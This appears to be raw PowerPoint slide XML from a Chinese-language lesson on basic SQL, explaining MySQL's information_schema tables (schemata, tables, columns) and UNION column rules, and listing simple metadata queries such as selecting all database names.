                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
                        <a:t>内容</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104657" marR="104657" marT="52329" marB="52329"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="935228408"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="828684">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                        <a:t>schemata</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104657" marR="104657" marT="52329" marB="52329"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>提供了当前</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>实例中所有数据库的信息</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104657" marR="104657" marT="52329" marB="52329"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3009513284"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1183986">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                        <a:t>tables</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104657" marR="104657" marT="52329" marB="52329"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>提供了关于数据库中的表的信息。详细表述了每个表属于哪个库、表类型、表引擎、创建时间等信息</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104657" marR="104657" marT="52329" marB="52329"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3739673537"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1229023">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
                        <a:t>columns</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104657" marR="104657" marT="52329" marB="52329"/>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b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="104657" marR="104657" marT="52329" marB="52329"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3359023944"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1298865800"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857112" y="553461"/>
            <a:ext cx="3447063" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33A93AA-ABC9-4F7D-964B-2A5FAFCF92C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838490" y="1088971"/>
            <a:ext cx="7720383" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{953C6979-2704-4A56-B265-AF3AB1C9DAC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781739" y="1939820"/>
            <a:ext cx="6255239" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>查看表结构：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>show columns from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>表名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6748199B-1474-4CA3-8BC4-934132A5F90A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781739" y="2865711"/>
            <a:ext cx="9214382" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>Schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>表中重要的列：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>存储当前用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所有数据库的库名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{368945C2-5278-4C21-B844-37A722C37B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857112" y="4189393"/>
            <a:ext cx="3775393" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>查询所有的数据库名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{459872D3-9E8F-4502-8157-7E634C2017F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="4876061"/>
            <a:ext cx="11808608" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1449372058"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
